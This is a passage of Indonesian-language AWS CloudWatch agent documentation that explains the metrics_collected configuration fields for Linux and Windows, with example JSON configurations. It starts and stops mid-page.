Untuk informasi selengkapnya tentang opsi konfigurasi yang tersedia untuk yang dikumpulkan, silakan lihat Ambil Metrik Kustom dengan koleksi . cpu – Opsional. Menentukan bahwa metrik CPU harus dikumpulkan. Bagian ini hanya valid untuk instans Linux. Anda harus memasukkan setidaknya satu resources dan totalcpu untuk setiap metrik CPU yang akan dikumpulkan. Bagian ini dapat mencakup bidang-bidang berikut: drop_original_metrics – Opsional. Jika Anda menggunakan bidang aggregation_dimensions di bagian metrics untuk menggulung metrik ke dalam hasil agregat, maka secara default agen mengirimkan metrik-metrik agregat dan metrik asli yang dipisahkan untuk setiap nilai dimensi. Jika Anda tidak ingin metrik asli dikirim CloudWatch, Anda dapat menentukan parameter ini dengan daftar metrik. Metrik yang ditentukan bersama dengan parameter ini tidak memiliki metrik berdasarkan dimensi yang dilaporkan. CloudWatch Sebaliknya, hanya metrik-metrik agregat saja yang dilaporkan. Hal ini akan mengurangi jumlah metrik yang dikumpulkan oleh agen, dan akan mengurangi biaya Anda. resources – Opsional. Tentukan bidang ini dengan nilai * untuk mengumpulkan metrik per-cpu. Satu-satunya nilai yang diperbolehkan adalah * . totalcpu – Opsional. Menentukan apakah pelaporan metrik cpu dikumpulkan di seluruh inti permasalahan. Bawaannya adalah benar. measurement – Tentukan rangkaian metrik cpu yang akan dikumpulkan. Kemungkinan nilai adalah time_active , time_guest , time_guest_nice , time_idle , time_iowait , time_irq , time_nice , time_softirq , time_steal , time_system , time_user , usage_active , usage_guest , usage_guest_nice , usage_idle , usage_iowait , usage_irq , usage_nice , usage_softirq , usage_steal , usage_system , dan usage_user . Kolom ini wajib diisi jika Anda menyertakan cpu . Secara bawaan, unit untuk cpu_usage_* adalah Percent , dan cpu_time_* metrik tidak memiliki unit. Di dalam entri untuk setiap metrik individu, secara opsional Anda dapat menentukan salah satu atau kedua hal berikut: rename – Menentukan nama yang berbeda untuk metrik ini. unit – Menentukan unit yang akan digunakan untuk metrik ini, membatalkan unit default None untuk metrik. Unit yang Anda tentukan harus merupakan satuan CloudWatch metrik yang valid, seperti yang tercantum dalam Unit deskripsi di MetricDatum . metrics_collection_interval – Opsional. Menentukan seberapa sering mengumpulkan metrik cpu, menggulingkan global metrics_collection_interval yang ditentukan dalam bagian agent dari file konfigurasi. Nilai ini ditentukan dalam detik. Misalnya, menentukan 10 metrik yang akan dikumpulkan setiap 10 detik, dan menetapkannya menjadi 300 metrik kustom untuk dikumpulkan setiap 5 menit. Jika Anda mengatur nilai ini di bawah 60 detik, setiap metrik dikumpulkan sebagai metrik resolusi tinggi. Untuk informasi selengkapnya tentang metrik resolusi tinggi, silakan lihat Metrik resolusi tinggi . append_dimensions – Opsional. Dimensi tambahan untuk digunakan hanya pada metrik cpu. Jika Anda menentukan bidang ini, maka bidang tersebut digunakan sebagai tambahan dimensi yang ditentukan dalam append_dimensions global yang digunakan untuk semua jenis metrik yang dikumpulkan oleh agen. disk – Opsional. Menentukan bahwa metrik disk harus dikumpulkan. Mengumpulkan metrik hanya untuk volume yang dipasang. Bagian ini hanya valid untuk instans Linux. Bagian ini dapat mencakup bidang-bidang berikut: drop_original_metrics – Opsional. Jika Anda menggunakan bidang aggregation_dimensions di bagian metrics untuk menggulung metrik ke dalam hasil agregat, maka secara default agen mengirimkan metrik-metrik agregat dan metrik asli yang dipisahkan untuk setiap nilai dimensi. Jika Anda tidak ingin metrik asli dikirim CloudWatch, Anda dapat menentukan parameter ini dengan daftar metrik. Metrik yang ditentukan bersama dengan parameter ini tidak memiliki metrik berdasarkan dimensi yang dilaporkan. CloudWatch Sebaliknya, hanya metrik-metrik agregat saja yang dilaporkan. Hal ini akan mengurangi jumlah metrik yang dikumpulkan oleh agen, dan akan mengurangi biaya Anda. resources – Opsional. Menentukan rangkaian titik pemasangan disk. Bidang ini membatasi CloudWatch untuk mengumpulkan metrik hanya dari titik pemasangan yang terdaftar. Anda dapat menentukan * sebagai nilai untuk mengumpulkan metrik dari semua titik pemasangan. Nilai bawaannya adalah mengumpulkan metrik dari semua titik dudukan. measurement – Menentukan larik metrik disk yang akan dikumpulkan. Kemungkinan nilai adalah free , total , used , used_percent , inodes_free , inodes_used , dan inodes_total . Kolom ini wajib diisi jika Anda menyertakan disk . catatan Metrik-metrik disk tersebut memiliki sebuah dimensi untuk Partition , yang berarti bahwa jumlah metrik kustom yang dihasilkan tergantung pada jumlah partisi yang dikaitkan dengan instans Anda. Jumlah partisi disk yang Anda miliki tergantung pada AMI mana yang Anda gunakan dan jumlah volume EBS Amazon yang Anda lampirkan di server. Untuk melihat satuan bawaan untuk setiap disk metrik, silakan lihat Metrik yang dikumpulkan oleh CloudWatch agen di instans Linux dan macOS . Di dalam entri untuk setiap metrik individu, secara opsional Anda dapat menentukan salah satu atau kedua hal berikut: rename – Menentukan nama yang berbeda untuk metrik ini. unit – Menentukan unit yang akan digunakan untuk metrik ini, membatalkan unit default None dari None untuk metrik tersebut. Unit yang Anda tentukan harus merupakan satuan CloudWatch metrik yang valid, seperti yang tercantum dalam Unit deskripsi di MetricDatum . ignore_file_system_types – Menentukan jenis sistem file untuk dikecualikan saat mengumpulkan metrik disk. Nilai yang valid termasuk sysfs , devtmpfs , dan sebagainya. drop_device – Mengatur ini untuk true penyebab Device tidak disertakan sebagai dimensi untuk metrik disk. Dengan mencegah Device agar tidak digunakan sebagai sebuah dimensi dapat berguna pada instans yang menggunakan sistem Nitro karena pada instans tersebut, nama perangkat berubah untuk setiap pemasangan disk ketika instans dinyalakan ulang. Hal ini dapat menyebabkan data tidak konsisten dalam metrik Anda dan menyebabkan alarm berdasarkan metrik tersebut masuk INSUFFICIENT DATA kondisi. Nilai default-nya false . metrics_collection_interval – Opsional. Menentukan seberapa sering mengumpulkan metrik disk, menggulingkan metrics_collection_interval yang ditentukan dalam agent di file konfigurasi. Nilai ini ditentukan dalam detik. Jika Anda mengatur nilai ini di bawah 60 detik, setiap metrik dikumpulkan sebagai metrik resolusi tinggi. Untuk informasi selengkapnya, lihat Metrik resolusi tinggi . append_dimensions – Opsional. Tentukan pasangan nilai kunci yang akan digunakan sebagai dimensi tambahan hanya untuk metrik disk. Jika Anda menentukan bidang ini, maka bidang ini akan digunakan sebagai tambahan dimensi yang ditentukan dalam bidang append_dimensions yang digunakan untuk semua jenis metrik yang dikumpulkan oleh agen. Satu pasangan kunci-nilai yang dapat Anda gunakan adalah sebagai berikut. Anda juga dapat menentukan pasangan nilai kunci khusus lainnya. "VolumeId":"$ { aws:VolumeId}" menambahkan VolumeId dimensi ke metrik disk perangkat blok Anda. Untuk volume Amazon EBS, ini akan menjadi ID Volume Amazon EBS. EC2 Misalnya toko, ini akan menjadi serial perangkat. Menggunakan ini membutuhkan drop_device parameter yang akan disetel ke false . diskio – Opsional. Menentukan bahwa i/o metrik disk yang akan dikumpulkan. Bagian ini hanya valid untuk instans Linux. Bagian ini dapat mencakup bidang-bidang berikut: drop_original_metrics – Opsional. Jika Anda menggunakan bidang aggregation_dimensions di bagian metrics untuk menggulung metrik ke dalam hasil agregat, maka secara default agen mengirimkan metrik-metrik agregat dan metrik asli yang dipisahkan untuk setiap nilai dimensi. Jika Anda tidak ingin metrik asli dikirim CloudWatch, Anda dapat menentukan parameter ini dengan daftar metrik. Metrik yang ditentukan bersama dengan parameter ini tidak memiliki metrik berdasarkan dimensi yang dilaporkan. CloudWatch Sebaliknya, hanya metrik-metrik agregat saja yang dilaporkan. Hal ini akan mengurangi jumlah metrik yang dikumpulkan oleh agen, dan akan mengurangi biaya Anda. resources – Opsional. Jika Anda menentukan larik perangkat, CloudWatch kumpulkan metrik hanya dari perangkat tersebut. Jika tidak, metrik untuk semua perangkat akan dikumpulkan. Anda juga dapat menentukan * sebagai nilai untuk mengumpulkan metrik dari semua perangkat. measurement — Menentukan larik metrik diskio dan AWS NVMe driver yang akan dikumpulkan untuk volume Amazon EBS dan volume penyimpanan instans yang dilampirkan ke instans Amazon. EC2 Nilai diskio yang mungkin adalah reads , writes , read_bytes , write_bytes ,, read_time write_time io_time , dan. iops_in_progress Untuk daftar metrik NVMe driver untuk volume Amazon EBS dan volume penyimpanan EC2 instans Amazon, lihat Kumpulkan metrik NVMe driver Amazon EBS dan. Kumpulkan metrik NVMe driver volume penyimpanan EC2 instans Amazon Kolom ini wajib diisi jika Anda menyertakan diskio . Di dalam entri untuk setiap metrik individu, secara opsional Anda dapat menentukan salah satu atau kedua hal berikut: rename – Menentukan nama yang berbeda untuk metrik ini. unit – Menentukan unit yang akan digunakan untuk metrik ini, membatalkan unit default None dari None untuk metrik tersebut. Unit yang Anda tentukan harus merupakan satuan CloudWatch metrik yang valid, seperti yang tercantum dalam Unit deskripsi di MetricDatum . Untuk informasi tentang unit default dan deskripsi metrik, lihat Kumpulkan metrik NVMe driver Amazon EBS . metrics_collection_interval – Opsional. Menentukan seberapa sering mengumpulkan metrik diskio, menggulingkan metrics_collection_interval yang ditentukan dalam agent di file konfigurasi. Nilai ini ditentukan dalam detik. Jika Anda mengatur nilai ini di bawah 60 detik, setiap metrik dikumpulkan sebagai metrik resolusi tinggi. Untuk informasi selengkapnya tentang metrik resolusi tinggi, silakan lihat Metrik resolusi tinggi . append_dimensions – Opsional. Dimensi tambahan untuk digunakan hanya untuk diskio metrics. Jika Anda menentukan bidang ini, maka bidang ini akan digunakan sebagai tambahan dimensi yang ditentukan dalam bidang append_dimensions yang digunakan untuk semua jenis metrik yang dikumpulkan oleh agen. swap – Opsional. Menentukan bahwa metrik memori swap harus dikumpulkan. Bagian ini hanya valid untuk instans Linux. Bagian ini dapat mencakup bidang-bidang berikut: drop_original_metrics – Opsional. Jika Anda menggunakan bidang aggregation_dimensions di bagian metrics untuk menggulung metrik ke dalam hasil agregat, maka secara default agen mengirimkan metrik-metrik agregat dan metrik asli yang dipisahkan untuk setiap nilai dimensi. Jika Anda tidak ingin metrik asli dikirim CloudWatch, Anda dapat menentukan parameter ini dengan daftar metrik. Metrik yang ditentukan bersama dengan parameter ini tidak memiliki metrik berdasarkan dimensi yang dilaporkan. CloudWatch Sebaliknya, hanya metrik-metrik agregat saja yang dilaporkan. Hal ini akan mengurangi jumlah metrik yang dikumpulkan oleh agen, dan akan mengurangi biaya Anda. measurement – Menentukan rangkaian metrik swap yang akan dikumpulkan. Nilai yang mungkin adalah free , used , dan used_percent . Kolom ini wajib diisi jika Anda menyertakan swap . Untuk melihat satuan bawaan untuk setiap swap metrik, silakan lihat Metrik yang dikumpulkan oleh CloudWatch agen di instans Linux dan macOS . Di dalam entri untuk setiap metrik individu, secara opsional Anda dapat menentukan salah satu atau kedua hal berikut: rename – Menentukan nama yang berbeda untuk metrik ini. unit – Menentukan unit yang akan digunakan untuk metrik ini, membatalkan unit default None dari None untuk metrik tersebut. Unit yang Anda tentukan harus merupakan satuan CloudWatch metrik yang valid, seperti yang tercantum dalam Unit deskripsi di MetricDatum . metrics_collection_interval – Opsional. Menentukan seberapa sering mengumpulkan metrik swap, menggulingkan metrics_collection_interval yang ditentukan dalam bagian agent di file konfigurasi. Nilai ini ditentukan dalam detik. Jika Anda mengatur nilai ini di bawah 60 detik, setiap metrik dikumpulkan sebagai metrik resolusi tinggi. Untuk informasi selengkapnya tentang metrik resolusi tinggi, silakan lihat Metrik resolusi tinggi . append_dimensions – Opsional. Dimensi tambahan untuk digunakan hanya pada metrik swap. Jika Anda menentukan bidang ini, maka bidang tersebut akan digunakan sebagai tambahan dimensi yang ditentukan dalam bidang append_dimensions global yang digunakan untuk semua jenis metrik yang dikumpulkan oleh agen. Ini dikumpulkan sebagai metrik resolusi tinggi. mem – Opsional. Menentukan bahwa metrik memori harus dikumpulkan. Bagian ini hanya valid untuk instans Linux. Bagian ini dapat mencakup bidang-bidang berikut: drop_original_metrics – Opsional. Jika Anda menggunakan bidang aggregation_dimensions di bagian metrics untuk menggulung metrik ke dalam hasil agregat, maka secara default agen mengirimkan metrik-metrik agregat dan metrik asli yang dipisahkan untuk setiap nilai dimensi. Jika Anda tidak ingin metrik asli dikirim CloudWatch, Anda dapat menentukan parameter ini dengan daftar metrik. Metrik yang ditentukan bersama dengan parameter ini tidak memiliki metrik berdasarkan dimensi yang dilaporkan. CloudWatch Sebaliknya, hanya metrik-metrik agregat saja yang dilaporkan. Hal ini akan mengurangi jumlah metrik yang dikumpulkan oleh agen, dan akan mengurangi biaya Anda. measurement – Menentukan susunan metrik memori yang akan dikumpulkan. Kemungkinan nilai adalah active , available , available_percent , buffered , cached , free , inactive , shared , total , used , dan used_percent . Kolom ini wajib diisi jika Anda menyertakan mem . Untuk melihat satuan bawaan untuk setiap mem metrik, silakan lihat Metrik yang dikumpulkan oleh CloudWatch agen di instans Linux dan macOS . Di dalam entri untuk setiap metrik individu, secara opsional Anda dapat menentukan salah satu atau kedua hal berikut: rename – Menentukan nama yang berbeda untuk metrik ini. unit – Menentukan unit yang akan digunakan untuk metrik ini, membatalkan unit default None untuk metrik. Unit yang Anda tentukan harus merupakan satuan CloudWatch metrik yang valid, seperti yang tercantum dalam Unit deskripsi di MetricDatum . metrics_collection_interval – Opsional. Menentukan seberapa sering mengumpulkan metrik mem, menggulingkan metrics_collection_interval yang ditentukan dalam agent di file konfigurasi. Nilai ini ditentukan dalam detik. Jika Anda mengatur nilai ini di bawah 60 detik, setiap metrik dikumpulkan sebagai metrik resolusi tinggi. Untuk informasi selengkapnya tentang metrik resolusi tinggi, silakan lihat Metrik resolusi tinggi . append_dimensions – Opsional. Dimensi tambahan untuk digunakan hanya untuk metrik mem. Jika Anda menetapkan bidang ini, maka bidang tersebut akan digunakan sebagai tambahan dimensi yang ditentukan dalam append_dimensions yang digunakan untuk semua jenis metrik yang dikumpulkan oleh agen. net – Opsional. Menentukan bahwa metrik jaringan akan dikumpulkan. Bagian ini hanya valid untuk instans Linux. Bagian ini dapat mencakup bidang-bidang berikut: drop_original_metrics – Opsional. Jika Anda menggunakan bidang aggregation_dimensions di bagian metrics untuk menggulung metrik ke dalam hasil agregat, maka secara default agen mengirimkan metrik-metrik agregat dan metrik asli yang dipisahkan untuk setiap nilai dimensi. Jika Anda tidak ingin metrik asli dikirim CloudWatch, Anda dapat menentukan parameter ini dengan daftar metrik. Metrik yang ditentukan bersama dengan parameter ini tidak memiliki metrik berdasarkan dimensi yang dilaporkan. CloudWatch Sebaliknya, hanya metrik-metrik agregat saja yang dilaporkan. Hal ini akan mengurangi jumlah metrik yang dikumpulkan oleh agen, dan akan mengurangi biaya Anda. resources – Opsional. Jika Anda menentukan array antarmuka jaringan, CloudWatch kumpulkan metrik hanya dari antarmuka tersebut. Jika tidak, metrik untuk semua perangkat akan dikumpulkan. Anda juga dapat menentukan * sebagai nilai untuk mengumpulkan metrik dari semua antarmuka. measurement – Menentukan susunan metrik jaringan yang akan dikumpulkan. Kemungkinan nilai adalah bytes_sent , bytes_recv , drop_in , drop_out , err_in , err_out , packets_sent , dan packets_recv . Kolom ini wajib diisi jika Anda menyertakan net . Untuk melihat satuan bawaan untuk setiap net metrik, silakan lihat Metrik yang dikumpulkan oleh CloudWatch agen di instans Linux dan macOS . Di dalam entri untuk setiap metrik individu, secara opsional Anda dapat menentukan salah satu atau kedua hal berikut: rename – Menentukan nama yang berbeda untuk metrik ini. unit – Menentukan unit yang akan digunakan untuk metrik ini, membatalkan unit default None untuk metrik. Unit yang Anda tentukan harus merupakan satuan CloudWatch metrik yang valid, seperti yang tercantum dalam Unit deskripsi di MetricDatum . metrics_collection_interval – Opsional. Menentukan seberapa sering mengumpulkan metrik bersih, menggulingkan metrics_collection_interval yang ditentukan dalam agent di file konfigurasi. Nilai ini ditentukan dalam detik. Misalnya, menentukan 10 metrik yang akan dikumpulkan setiap 10 detik, dan menetapkannya menjadi 300 metrik kustom untuk dikumpulkan setiap 5 menit. Jika Anda mengatur nilai ini di bawah 60 detik, setiap metrik dikumpulkan sebagai metrik resolusi tinggi. Untuk informasi selengkapnya tentang metrik resolusi tinggi, silakan lihat Metrik resolusi tinggi . append_dimensions – Opsional. Dimensi tambahan untuk digunakan hanya pada metrik bersih. Jika Anda menentukan bidang ini, maka bidang tersebut akan digunakan sebagai tambahan dimensi yang ditentukan dalam bidang append_dimensions yang digunakan untuk semua jenis metrik yang dikumpulkan oleh agen. netstat – Opsional. Menentukan bahwa metrik status koneksi TCP dan koneksi UDP akan dikumpulkan. Bagian ini hanya valid untuk instans Linux. Bagian ini dapat mencakup bidang-bidang berikut: drop_original_metrics – Opsional. Jika Anda menggunakan bidang aggregation_dimensions di bagian metrics untuk menggulung metrik ke dalam hasil agregat, maka secara default agen mengirimkan metrik-metrik agregat dan metrik asli yang dipisahkan untuk setiap nilai dimensi. Jika Anda tidak ingin metrik asli dikirim CloudWatch, Anda dapat menentukan parameter ini dengan daftar metrik. Metrik yang ditentukan bersama dengan parameter ini tidak memiliki metrik berdasarkan dimensi yang dilaporkan. CloudWatch Sebaliknya, hanya metrik-metrik agregat saja yang dilaporkan. Hal ini akan mengurangi jumlah metrik yang dikumpulkan oleh agen, dan akan mengurangi biaya Anda. measurement – Menentukan susunan metrik netstat yang akan dikumpulkan. Kemungkinan nilai adalah tcp_close , tcp_close_wait , tcp_closing , tcp_established , tcp_fin_wait1 , tcp_fin_wait2 , tcp_last_ack , tcp_listen , tcp_none , tcp_syn_sent , tcp_syn_recv , tcp_time_wait , dan udp_socket . Kolom ini wajib diisi jika Anda menyertakan netstat . Untuk melihat satuan bawaan untuk setiap netstat metrik, silakan lihat Metrik yang dikumpulkan oleh CloudWatch agen di instans Linux dan macOS . Di dalam entri untuk setiap metrik individu, secara opsional Anda dapat menentukan salah satu atau kedua hal berikut: rename – Menentukan nama yang berbeda untuk metrik ini. unit – Menentukan unit yang akan digunakan untuk metrik ini, membatalkan unit default None untuk metrik. Unit yang Anda tentukan harus merupakan satuan CloudWatch metrik yang valid, seperti yang tercantum dalam Unit deskripsi di MetricDatum . metrics_collection_interval – Opsional. Menentukan seberapa sering mengumpulkan metrik netstat, menggulingkan metrics_collection_interval yang ditentukan dalam agent di file konfigurasi. Nilai ini ditentukan dalam detik. Jika Anda mengatur nilai ini di bawah 60 detik, setiap metrik dikumpulkan sebagai metrik resolusi tinggi. Untuk informasi selengkapnya tentang metrik resolusi tinggi, silakan lihat Metrik resolusi tinggi . append_dimensions – Opsional. Dimensi tambahan untuk digunakan hanya pada metrik netstat. Jika Anda menentukan bidang ini, maka bidang tersebut akan digunakan sebagai tambahan dimensi yang ditentukan dalam bidang append_dimensions yang digunakan untuk semua jenis metrik yang dikumpulkan oleh agen. processes – Opsional. Menentukan bahwa metrik proses akan dikumpulkan. Bagian ini hanya valid untuk instans Linux. Bagian ini dapat mencakup bidang-bidang berikut: drop_original_metrics – Opsional. Jika Anda menggunakan bidang aggregation_dimensions di bagian metrics untuk menggulung metrik ke dalam hasil agregat, maka secara default agen mengirimkan metrik-metrik agregat dan metrik asli yang dipisahkan untuk setiap nilai dimensi. Jika Anda tidak ingin metrik asli dikirim CloudWatch, Anda dapat menentukan parameter ini dengan daftar metrik. Metrik yang ditentukan bersama dengan parameter ini tidak memiliki metrik berdasarkan dimensi yang dilaporkan. CloudWatch Sebaliknya, hanya metrik-metrik agregat saja yang dilaporkan. Hal ini akan mengurangi jumlah metrik yang dikumpulkan oleh agen, dan akan mengurangi biaya Anda. measurement – Menentukan rangkaian metrik proses yang akan dikumpulkan. Kemungkinan nilai adalah blocked , dead , idle , paging , running , sleeping , stopped , total , total_threads , wait , dan zombies . Kolom ini wajib diisi jika Anda menyertakan processes . Untuk semua processes metrik, unit bawaan adalah None . Di dalam entri untuk setiap metrik individu, secara opsional Anda dapat menentukan salah satu atau kedua hal berikut: rename – Menentukan nama yang berbeda untuk metrik ini. unit – Menentukan unit yang akan digunakan untuk metrik ini, membatalkan unit default None untuk metrik. Unit yang Anda tentukan harus merupakan satuan CloudWatch metrik yang valid, seperti yang tercantum dalam Unit deskripsi di MetricDatum . metrics_collection_interval – Opsional. Menentukan seberapa sering mengumpulkan metrik proses, menggulingkan metrics_collection_interval yang ditentukan dalam agent di file konfigurasi. Nilai ini ditentukan dalam detik. Misalnya, menentukan 10 metrik yang akan dikumpulkan setiap 10 detik, dan menetapkannya menjadi 300 metrik kustom untuk dikumpulkan setiap 5 menit. Jika Anda mengatur nilai ini di bawah 60 detik, setiap metrik dikumpulkan sebagai metrik resolusi tinggi. Untuk informasi selengkapnya, lihat Metrik resolusi tinggi . append_dimensions – Opsional. Dimensi tambahan untuk digunakan hanya pada metrik proses. Jika Anda menentukan bidang ini, maka bidang tersebut akan digunakan sebagai tambahan dimensi yang ditentukan dalam bidang append_dimensions yang digunakan untuk semua jenis metrik yang dikumpulkan oleh agen. nvidia_gpu – Opsional. Menentukan bahwa metrik NVIDIA GPU harus dikumpulkan. Bagian ini hanya berlaku untuk instans Linux pada host yang dikonfigurasi dengan akselerator GPU NVIDIA dan melakukan instalasi Antarmuka Manajemen Sistem NVIDIA (nvidia-smi). Metrik GPU NVIDIA yang dikumpulkan diawali dengan string nvidia_smi_ untuk membedakannya dari metrik yang dikumpulkan untuk jenis akselerator lainnya. Bagian ini dapat mencakup bidang-bidang berikut: drop_original_metrics – Opsional. Jika Anda menggunakan bidang aggregation_dimensions di bagian metrics untuk menggulung metrik ke dalam hasil agregat, maka secara default agen mengirimkan metrik-metrik agregat dan metrik asli yang dipisahkan untuk setiap nilai dimensi. Jika Anda tidak ingin metrik asli dikirim CloudWatch, Anda dapat menentukan parameter ini dengan daftar metrik. Metrik yang ditentukan bersama dengan parameter ini tidak memiliki metrik berdasarkan dimensi yang dilaporkan. CloudWatch Sebaliknya, hanya metrik-metrik agregat saja yang dilaporkan. Hal ini akan mengurangi jumlah metrik yang dikumpulkan oleh agen, dan akan mengurangi biaya Anda. measurement – Menentukan larik metrik NVIDIA GPU yang akan dikumpulkan. Untuk daftar nilai yang mungkin digunakan di sini, silakan lihat kolom Metrik dalam tabel di Kumpulkan metrik GPU NVIDIA . Di dalam entri untuk setiap metrik individu, Anda dapat menentukan salah satu atau kedua hal berikut secara opsional: rename – Menentukan nama yang berbeda untuk metrik ini. unit – Menentukan unit yang akan digunakan untuk metrik ini, membatalkan unit default None untuk metrik. Unit yang Anda tentukan harus merupakan satuan CloudWatch metrik yang valid, seperti yang tercantum dalam Unit deskripsi di MetricDatum . metrics_collection_interval – Opsional. Menentukan seberapa sering mengumpulkan metrik GPU NVIDIA, membatalkan global yang metrics_collection_interval ditentukan dalam agent bagian file konfigurasi. jmx – Opsional. Menentukan bahwa Anda ingin mengambil metrik Java Management Extensions (JMX) dari instance. Untuk informasi selengkapnya tentang parameter yang dapat Anda gunakan di bagian ini dan metrik yang dapat Anda kumpulkan, lihat Kumpulkan metrik Java Management Extensions (JMX) . otlp – Opsional. Menentukan bahwa Anda ingin mengumpulkan metrik dari SDK. OpenTelemetry Untuk informasi selengkapnya tentang bidang yang dapat Anda gunakan di bagian ini, lihat Kumpulkan metrik dan jejak dengan OpenTelemetry . procstat – Opsional. Menjelaskan bahwa Anda ingin mengambil metrik dari proses individu. Untuk informasi selengkapnya tentang opsi konfigurasi yang tersedia untuk procstat, silakan lihat Kumpulkan Metrik Proses dengan Plugin procstat . statsd – Opsional. Menentukan bahwa Anda ingin mengambil metrik kustom menggunakan StatsD protokol. CloudWatch Agen bertindak sebagai daemon untuk protokol. Anda menggunakan StatsD klien standar apa pun untuk mengirim metrik ke CloudWatch agen. Untuk informasi selengkapnya tentang opsi konfigurasi yang tersedia untuk StatsD, silakan lihat Ambil metrik kustom dengan StatSD . ethtool – Opsional. Menentukan bahwa Anda ingin mengambil metrik jaringan menggunakan plugin ethtool . Plugin ini dapat mengimpor metrik yang dikumpulkan oleh utilitas ethtool standar, serta metrik kinerja jaringan dari instans Amazon. EC2 Untuk informasi selengkapnya tentang opsi konfigurasi yang tersedia untuk ethtool, silakan lihat Mengumpulkan metrik performa jaringan . Berikut ini adalah contoh metrics untuk server Linux. Dalam contoh ini, tiga metrik CPU, tiga metrik netstat, tiga metrik proses, dan satu metrik disk dikumpulkan, dan agen diatur untuk menerima metrik tambahan dari collectd klien mereka. "metrics": { "aggregation_dimensions" : [["AutoScalingGroupName"], ["InstanceId", "InstanceType"],[]], "metrics_collected": { "collectd": { }, "cpu": { "resources": [ "*" ], "measurement": [ { "name": "cpu_usage_idle", "rename": "CPU_USAGE_IDLE", "unit": "Percent"}, { "name": "cpu_usage_nice", "unit": "Percent"}, "cpu_usage_guest" ], "totalcpu": false, "drop_original_metrics": [ "cpu_usage_guest" ], "metrics_collection_interval": 10, "append_dimensions": { "test": "test1", "date": "2017-10-01" } }, "netstat": { "measurement": [ "tcp_established", "tcp_syn_sent", "tcp_close" ], "metrics_collection_interval": 60 }, "disk": { "measurement": [ "used_percent" ], "resources": [ "*" ], "drop_device": true }, "processes": { "measurement": [ "running", "sleeping", "dead" ] } }, "append_dimensions": { "ImageId": "$ { aws:ImageId}", "InstanceId": "$ { aws:InstanceId}", "InstanceType": "$ { aws:InstanceType}", "AutoScalingGroupName": "$ { aws:AutoScalingGroupName}" } } Server Windows Di bagian metrics_collected untuk Windows Server, Anda dapat memiliki subbagian untuk setiap objek performa Windows, seperti Memory , Processor , dan LogicalDisk . Untuk informasi tentang apa objek dan counter tersedia, silakan lihat Performance Counters di dokumentasi Microsoft Windows. Dalam subbagian untuk setiap objek, Anda menentukan measurement baris konter untuk mengumpulkan. measurement larik diperlukan untuk setiap objek yang Anda tentukan dalam file konfigurasi. Anda juga dapat menentukan resources untuk menamai kejadian untuk mengumpulkan metrik. Anda juga dapat menentukan * untuk resources untuk mengumpulkan metrik terpisah untuk setiap instans. Jika Anda menghilangkan resources penghitung yang memiliki instans, data untuk semua instans dikumpulkan menjadi satu set. Jika Anda menghilangkan resources penghitung yang tidak memiliki instance, penghitung tidak dikumpulkan oleh agen. CloudWatch Untuk menentukan apakah counter memiliki instans, Anda dapat menggunakan salah satu dari perintah berikut. PowerShell: Get-Counter -ListSet * Baris perintah (bukan Powershell): TypePerf.exe –q Dalam setiap bagian objek, Anda juga dapat menentukan kolom opsional berikut: metrics_collection_interval – Opsional. Menentukan seberapa sering mengumpulkan metrik untuk objek ini, menggulingkan metrics_collection_interval yang ditentukan dalam agent di file konfigurasi. Nilai ini ditentukan dalam detik. Misalnya, menentukan 10 metrik yang akan dikumpulkan setiap 10 detik, dan menetapkannya menjadi 300 metrik kustom untuk dikumpulkan setiap 5 menit. Jika Anda mengatur nilai ini di bawah 60 detik, setiap metrik dikumpulkan sebagai metrik resolusi tinggi. Untuk informasi selengkapnya, lihat Metrik resolusi tinggi . append_dimensions – Opsional. Menentukan dimensi tambahan untuk digunakan hanya pada metrik untuk objek ini. Jika Anda menentukan bidang ini, maka bidang tersebut akan digunakan sebagai tambahan dimensi yang ditentukan dalam bidang append_dimensions global yang digunakan untuk semua jenis metrik yang dikumpulkan oleh agen. drop_original_metrics – Opsional. Jika Anda menggunakan bidang aggregation_dimensions di bagian metrics untuk menggulung metrik ke dalam hasil agregat, maka secara default agen mengirimkan metrik-metrik agregat dan metrik asli yang dipisahkan untuk setiap nilai dimensi. Jika Anda tidak ingin metrik asli dikirim CloudWatch, Anda dapat menentukan parameter ini dengan daftar metrik. Metrik yang ditentukan bersama dengan parameter ini tidak memiliki metrik berdasarkan dimensi yang dilaporkan. CloudWatch Sebaliknya, hanya metrik-metrik agregat saja yang dilaporkan. Hal ini akan mengurangi jumlah metrik yang dikumpulkan oleh agen, dan akan mengurangi biaya Anda. Dalam setiap bagian penghitung, Anda juga dapat menentukan kolom opsional berikut: rename - Menentukan nama yang berbeda untuk digunakan dalam CloudWatch metrik ini. unit – Menentukan unit yang akan digunakan untuk metrik ini. Unit yang Anda tentukan harus merupakan satuan CloudWatch metrik yang valid, seperti yang tercantum dalam Unit deskripsi di MetricDatum . Ada bagian opsional lain yang dapat Anda sertakan dalam metrics_collected : statsd – Memungkinkan Anda mengambil kembali metrik kustom menggunakan StatsD protokol. CloudWatch Agen bertindak sebagai daemon untuk protokol. Anda menggunakan standar StatsD untuk mengirim metrik ke CloudWatch agen. Untuk informasi selengkapnya, lihat Ambil metrik kustom dengan StatSD . procstat – Memungkinkan Anda mengambil metrik dari proses individu. Untuk informasi selengkapnya, lihat Kumpulkan Metrik Proses dengan Plugin procstat . jmx – Opsional. Menentukan bahwa Anda ingin mengambil metrik Java Management Extensions (JMX) dari instance. Untuk informasi selengkapnya tentang bidang yang dapat Anda gunakan di bagian ini dan metrik yang dapat Anda kumpulkan, lihat Kumpulkan metrik Java Management Extensions (JMX) . otlp – Opsional. Menentukan bahwa Anda ingin mengumpulkan metrik dari SDK. OpenTelemetry Untuk informasi selengkapnya tentang bidang yang dapat Anda gunakan di bagian ini, lihat Kumpulkan metrik dan jejak dengan OpenTelemetry . Berikut ini adalah contoh metrics untuk digunakan di Server Windows. Dalam contoh ini, banyak metrik Windows yang dikumpulkan, dan komputer juga diatur untuk menerima metrik tambahan dari StatsD klien mereka. "metrics": { "metrics_collected": { "statsd": { }, "Processor": { "measurement": [ { "name": "% Idle Time", "rename": "CPU_IDLE", "unit": "Percent"}, "% Interrupt Time", "% User Time", "% Processor Time" ], "resources": [ "*" ], "append_dimensions": { "d1": "win_foo", "d2": "win_bar" } }, "LogicalDisk": { "measurement": [ { "name": "% Idle Time", "unit": "Percent"}, { "name": "% Disk Read Time", "rename": "DISK_READ"}, "% Disk Write Time" ], "resources": [ "*" ] }, "Memory": { "metrics_collection_interval": 5, "measurement": [ "Available Bytes", "Cache Faults/sec", "Page Faults/sec", "Pages/sec" ], "append_dimensions": { "d3": "win_bo" } }, "Network Interface": { "metrics_collection_interval": 5, "measurement": [ "Bytes Received/sec", "Bytes Sent/sec", "Packets Received/sec", 